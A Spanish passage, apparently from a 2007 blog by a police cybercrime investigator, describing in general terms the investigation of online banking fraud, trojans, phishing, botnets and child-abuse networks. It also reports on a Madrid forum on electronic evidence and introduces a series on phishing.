¿Pero que peligros se avecinan de esta evolución de las redes?, desde la posibilidad de ser usados por Grupos Organizados como vías de comunicación, a ser vías de envío de material malicioso a través de las mismas, programas de mensajería entre grupos ilícitos con espacios virtuales en la red de material ilegal como el pedófilo, o bien puntos de reunión de Grupos para ciberdelinquir o de almacenamiento de medios materiales para la cibercrimen, intercambio, venta o alquiler de Máquinas Zombies para realización de actos criminales a esta sociedad digital.

Rastros de las comunicaciones, direcciones IP.
Así se hace necesario el conocimiento de los protocolos de comunicación de estos nuevos servicios y los rastros de estas comunicaciones establecidas para poder seguir a los actores que intervienen o bien poder solicitar las correspondientes obligaciones y responsabilidades a las personas que administren esos servicios para que guarden la información necesaria para garantizar esta información en el caso de poder ser facilitada a las autoridades para dar respuesta a un bien jurídico violentado.

Territorialidad
La investigación en Internet tiene otra dificultad añadida que afecta a todas las Policías del Mundo, el espacio de Internet carece de fronteras, y el contenido ilícito, en milésimas de segundos, se difunde por todo el Mundo.

Las Investigaciones constantemente desembocan en Comisiones Rogatorias o acuerdos bilaterales o multilaterales entre países que demoran cuantiosamente el tiempo del esclarecimiento de los hechos perjudicando gravemente el resultado satisfactorio de la investigación, y siempre que la legislación en el país al que solicitemos la información permita facilitarla.

La solución policial se consigue gracias a la cooperación interpolicial acordada en las mesas de trabajo, reuniones, foros y congresos donde se plantean los problemas comunes y se marcan acuerdos de cooperación básicos tendentes a agilizar, asegurar, detectar, analizar y planificar los elementos probatorios para cuando por medio de la Autoridad Judicial del país en cuestión se ordene se pueda llegar a buen fin dicha operación

Espacios públicos de Internet, máquinas caches, proxies, maquinas comprometidas, redes inalámbricas

Del mismo modo que la solicitud de datos a países en que su legislación impida o favorezca la no facilitación de la información requerida de un hecho tipificado ilícito en nuestro país hay más dificultades añadidas como:
• La falta de regulación de los espacios públicos de Internet, locutorios, salas de informática públicas, cibercafés, bibliotecas, centros educativos, máquinas populares de acceso a Internet y otras donde de forma anónima las personas pueden conectarse y realizar actividades ilícitas
• Lo mismo con las redes inalámbricas libres al alcance de equipos con conexiones inalámbricas capaces de conectarse a esas redes para la conexión a Internet con el anonimato de la no pertenencia del grupo autorizado
• Máquinas Zombies controladas remotamente y que permiten ser utilizadas como medio intermedio para dificultar el seguimiento de las comunicaciones

Los Cuerpos policiales llegados al punto de identificar una de esas máquinas anónimas como la del inicio de la actividad delictiva se debe emplear otras técnicas tradicionales para saber quién estaba en ese lugar en el instante señalado.

• De modo similar es que sabiendo que una máquina esta comprometida por ser accesible a través de una conexión ya sea a través de Internet u otro tipo de red o conexión y nos convirtamos en una Work Station virtual de dicha máquina para navegar a través de su dirección IP, con el agravante de que circulan habitualmente por Internet direcciones de máquinas proxies públicas.

Aquí, una vez identificada la máquina comprometida o máquina proxy se debe hacer un Análisis Informático Forense en dicha máquina y en las relacionadas directamente para descubrir las trazas de la conexión y detectar la procedencia de la conexión a la misma.

5.- Cibercrimen

Ciberterrorismo y Cibernarcotráfico

El empleo de las comunicaciones a través de Internet con enmascaramiento, cifrados, esteganografía es una de las dificultades añadidas en la persecución de estos delitos. La solución esta en emplear aquellos medios humanos y técnicos capaces de interceptar, desencriptar y analizar los mensajes que circulan. Además de la potencialidad de que los grupos de Terror atenten contra la Sociedad utilizando la Red.

Fraudes a través de Internet

Además delos fraudes tradicionales adaptados a las nuevas tecnologías como en el caso de las ventas y subastas, la tipología que despunta en este mundo digital es el fraude a la Banca OnLine, modalidad que conjuga un cúmulo de recursos empleando verdaderas técnicas de harding del Underground de Internet, empezando desde la Ingenieria Social, y pasando por la creación o manipulación de troyanos capaces de incorporar keyloggers, screengrabbers, programas de control remoto con apertura de puertos y sockets de comunicación, spyware, técnicas antiforenses con anulación de programas de seguridad, entre otros, siendo Zero-days o empleando técnicas que hacen a la victima desactivar su seguridad como jugar con la necesidad de acceder a un espacio Web o a un recurso donde el antivirus impide su acceso, creación de WebSpoofings para captar información o crear una falsa licitud de actividad de una empresa u organización, Scams utilizando botnets o servidores de correos open relay, máquinas troyanizadas para realizar las transferencias bancarias, utilización de colaboradores engañados para la realización del blanqueo a través de empresas de transferencias internacionales de dinero, contratación de Sistemas Autónomos y creación de dominios con falsedad de los datos.
Y ¿cómo llega la victima a esa trampa digital que es la falsa página?, pues de diversas maneras, bien empleando técnicas de phishing a través de correos electrónicos convenciendo a la victima de que se trata de alguien relacionado con la página real que intenta suplantar para que a través del hiperenlace enviado con el correo llegue a dicho destino y confíe su bien preciado y tesoro a conseguir, bien empleando otras técnicas junto con la Ingeniería social, y ya sea a través de programas de mensajería instantánea, foros, grupos de noticias, listas de distribución, anuncios virtuales, subastas o compra ventas, programas de intercambio, o técnicas fuera de la Red remitiéndote a la misma ejemplo por teléfono:
También la victima puede llegar a la página simulada por acción de un cambio de la configuración de su equipo informático, cambiándole la página de inicio, los ficheros de asociación locales de urls a direcciones IP, virus o troyanos, emplear técnicas de spam para inundar el ciberespacio de correo llevando embebido código malicioso capaz de alojarse en tu máquina y como nave espacial exploradora, llevar incorporado una serie de programas capaces del mejor de los “hackers”, verdaderamente existen proezas que consiguen resultados asombrosos. Por citar uno de ellos reales realizado el año pasado que conjugaba una serie de estrategias para conseguir su propósito.
Una Organización de un País del Este crea y administra varias páginas de pornografía infantil en máquinas controladas por la Organización, en las mismas coloca software malicioso y difunde a través de foro las url’s para que los individuos que accedan a dichas páginas se encuentran que se llevan de regalo un bonito troyano, recién creado que una gran mayoría de antivirus no tienen todavía en sus bases de datos virales, o bien, aquellos que su antivirus detecta y bloquea el acceso lo desactiva la propia victima por la avidez de la visualización de las páginas pornográficas, infectándose, Una vez que el troyano descarga su material deshabilitaba los programas de seguridad.
Mientras tanto la organización envía a nuestro país individuos para aperturar varias cuentas bancarias con documentación falsa.
El troyano en la máquina de la victima incorpora un programa que escucha la barra de direcciones de los exploradores más habituales y utilizando una lista con nombres de objetivos espera que aparezca una de esas palabras para lanzar un sniffer o presentar falsas ventanas simulando la entidad para captar la información. Pero además abre puertos de control remota para habilitar la máquina comprometida como proxy y como cliente ftp,se conectaba a una máquina, para actualizaciones de los códigos maliciosos.
Los delincuentes una vez obtenidos los datos de acceso a la banca virtual, se conectaban a la máquina de otra victima a través del puerto que la habilitaba como proxy y desde esta máquina se conectaban a la banca electrónica donde transferían capital a una de las cuentas que había creado el enviado en el viaje relámpago a España. Así que desde la impunidad de la cobertura que da el realizar las acciones donde la jurisdicción española no llega, hacían la disposición del patrimonio sustraído también por Red.

Pornografía Infantil

La sensación de impunidad y anonimato que proporciona Internet hace que los indeseables de esta faceta delictiva utilicen como medio de distribución de sus infames proezas a cambio de obtención de imágenes y videos de otros individuos de las mismas tendencias. Pero más preocupante es la posibilidad que la Red otorga a la constitución de una comunidad paidófila, donde a los miembros de la comunidad “le identifica, le refuerza y le asiste en su conducta desviada”, proporcionándole no solo el material multimedia para aliviar sus necesidades, o la información necesaria para satisfacerla plenamente, sino una razón de ser, incluso albergando la posibilidad de que la pederastría sea en el futuro una legítima opción sexual más.
La colaboración interpolicial en la lucha de esta actividad delincuencial produce sus frutos en la detección de la procedencia de los intercambios pese a la globalización debido a las interconexiones entre diferentes países y las distintas competencias jurisdiccionales de estos, ya que en el fondo esta lucha no es sino un tratamiento sintomático de otro fenómeno mucho más grave, la agresión sexual y abuso a menores de edad.

Seguridad Lógica. Extorsiones Criptovirales

Los accesos inconsentidos a las máquinas conectadas a la Red obedecen a distintos objetivos, no solo los relacionados a la obtención de información confidencial, ya sea personal o empresarial, ni a efectuar daños informáticos por distintos motivos, generalmente por venganza o competencia, sino que los grupos delincuenciales están empleando estos ataques para coaccionar a las victimas a través de dificultar el acceso a sus recursos, caso de las extorsiones criptovirales, donde a través de una encriptación de la información contenida exigen un rescate para la “vacuna”.

6.- Ciberinteligencia como solución al Cibercrimen

A medida de esta exposición hemos visto algunas problemáticas y su viabilidad de resolución, pero la actuación policial no se limita a intentar resolver esos problemas de una forma puntual cuando el hecho es uno y el problema se suscita, la Policía aquí emplea todas las posibles vías de investigación de forma que lo que se pretende es el tener un conocimiento lo más amplio posible del hecho, reconstruyendo el mismo, conociendo los protocolos empleados, la línea temporal, las máquinas y personas involucradas directa o indirectamente, las necesidades técnicas necesarias para llevar a cabo el suceso, ver si el hecho es puntual o múltiple, y si ha habido otros hechos relacionados ante-contemporáneos-post al mismo, los vestigios que ha producido el mismo en su ejecución, las situaciones que han producido en el entorno humano, social y empresarial, y otras variables que a través de un buen análisis permitirá a los investigadores obtener vías de investigación, pero los problemas de la Seguridad de Internet no solo se intentan paliar de una forma post hechos, sino también los que se producen y los que potencialmente se detectan como viables se transmiten, se intercambian posibles soluciones y se discuten en foros, congresos, conferencias, cursos, encuentros, reuniones, mesas de trabajo, entre los diferentes Cuerpos de Seguridad, Instituciones y Organismos, Empresas relacionadas, Técnicos y especialistas en las materias involucradas, e incluso a las potenciales victimas ya que hasta el ciudadano tiene información valiosa, cuando es victima de un ataque, para aportar al Cuerpo Investigador que permita dar conocer a la Sociedad las formas delictivas detectadas de realización, y establecer políticas de seguridad, tanto en implementación de sistemas, mantenimiento, actualización y control sobre accesos a aplicaciones o sistemas de usuarios autorizados, contraseñas seguras y custodia, gestión de la red por responsable cualificado, son medidas esenciales para evitar un altísimo porcentaje de incidencias en la red.
A nivel técnico el conocer el medio a un nivel superior a los atacantes permite el obtener información más allá de lo imaginado por el autor y que si su sapiencia se lo permite habrá intentado camuflar, modificar o incluso borrar, pero como siempre lo absoluto es improbable por no decir imposible de conseguir, siempre quedan vestigios no controlados por el delincuente ya sean por procesos automatizados propios de las comunicaciones, sistemas, políticas de seguridad, funcionamiento de optimización de los equipos o incluso en caso de fallas de funcionamiento que vierten información en lugares insospechados.
Toda esta información debe ser canalizada, almacenada, ordenada, filtrada, expurgada y analizada mediante técnicas de Inteligencia, CIBERINTELIGENCIA, que nos permitirán una lucha efectiva contra el CiberCrimen.

Madrid a 15 de junio de 2007
(Material docente de libre distribución, citando al autor)

SIT-1 The truth is not single real, also can be digital!

IV Foro de las evidencias electrónicas

2007-06-18T20:07:00.000+02:00

15 de junio de 2007 Hotel Ritz, de Madrid

Desde el año 2004 se viene celebrando el foro de las evidencias tecnológicas, un encuentro de intercambio de Información entre técnicos, juristas y responsables de la Seguridad del Estado de las Nuevas Tecnologías y sus circunstancias, con el fin de elaborar un marco legislativo que proteja en última instancia los derechos de ciudadanos y empresas. El acto de este año, organizado por Albalia Interactiva y el despacho de abogados Garrigues, fue el cuarto que se celebra y fue repartido en varias sesiones, siendo estas:

Primera Sesión: Prueba Electrónica, donde participaron:

* Mª Ángeles Manzano, Socia de Garrigues
* Enrique López, Vocal del Consejo General del Poder Judicial
* Manuel Marchena, Magistrado de la Sala Segunda del Tribunal Supremo

Sesión moderada por Cesar Belda, Notario del Consejo General del Notariado. Director General de Feste

Segunda Sesión: Ciberdelincuencia, donde participaron:

* Juan Salom, Grupo de Delitos Telemáticos. Unidad Central Operativa. Guardia Civil
* Jorge Martín. Brigada de Investigación Tecnológica. Cuerpo Nacional de Policía
* Juan Carlos Ruiloba. Sección de Investigación Tecnológica de Barcelona. Cuerpo Nacional de Policía

Sesión moderada por D. Jorge Alcalde. Periodista. Director Revista Quo

Tercera Sesión: Desmaterialización de la Propiedad Intelectual: el ejemplar electrónico, donde participaron:

* Pablo Hernández. Director Servicios Jurídicos. SGAE
* Bárbara Navarro. Directora Antipiratería. NBC Universal
* Salvador Esteban, Director de Asesoría Jurídica de la Federación Antipiratería

Sesión moderada por D. José María Anguiano. Socio de Garrigues

Cuarta Sesión: Aspectos Técnicos de la Prueba Electrónica, donde participaron:

* Vicente Calzado, Director División de Tecnología de Informática El Corte Inglés
* Luis Jara. Director de Seguridad e-Security & Professional Services de T-Systems
* Carlos Jiménez, Presidente de Secuware
* Matías Bevilacqua, Director Tecnológico de Cybex
* Juan Ramón Fontán, Advisory Services Manager de Symantec

Sesión moderada por D. Julián Inza. Presidente de Albalia Interactiva

Esta sesión se cerró con la intervención de Sebastián Muriel, Director General de Red.es centrada en las Actuaciones de Red.es en el Ámbito de la Seguridad Informática.

El Resumen y las Conclusiones finales fueron llevadas a cabo por Antonio Garrigues Walker, cerrando el Foro D. Francisco Ros, Secretario de Estado de Telecomunicaciones y para la Sociedad de la Información del Ministerio de Industria, Turismo y Comercio que destacó los avances que se han producido recientemente en el desarrollo de la Sociedad de la Información en España y el futuro que se avecina.

La sesión de Ciberdelincuencia versó en la visión delictiva actual y la proyección de las tendencias futuras, reflejándose la problemática de la Investigación y las posibles soluciones, encuadradas estas en la colaboración de todos en hacer un Internet más seguro en los nuevos servicios que se lancen y el intercambio de información entre los actores.

No solo es SCAM el Phishing

2007-06-04T13:13:00.000+02:00

No solo por Scam llega la amenaza del compromiso de tu privacidad. La forma de rediccionarte a una WebSpoofing puede ser de cualquier forma, desde un mensaje de telefonía móvil a un enlace desde un buscador, pasando por foros, IM, P2P, o cualquier otro servicio. Luego la técnica de phishing empleada puede ser directa o indirecta, es decir introduces las claves en tu Servicio real bajo el control de un sniffer que esta capturando la información confidencial o bien los introduces en una simulación, más o menos similar a la de tu entidad, pensando que la comunicación es de C2B.
En este Blog pretenderé explicar algunos de los sistemas que se vienen empleando en esta modalidad delictiva, sobre todo aquellos menos conocidos o más complejos para asi poder utilizar nuestros servicios con mayor seguridad.
Agradeceré también todas las colaboraciones recibidas que ayuden a los usuarios a solucionar este problema, mediante técnicas detectadas, Web falsas creadas, SCAM's recibidos, ofertas de trabajo falsas para convertirse en colaboradores, etc.

SIT-1 The truth is not single real, also can be digital!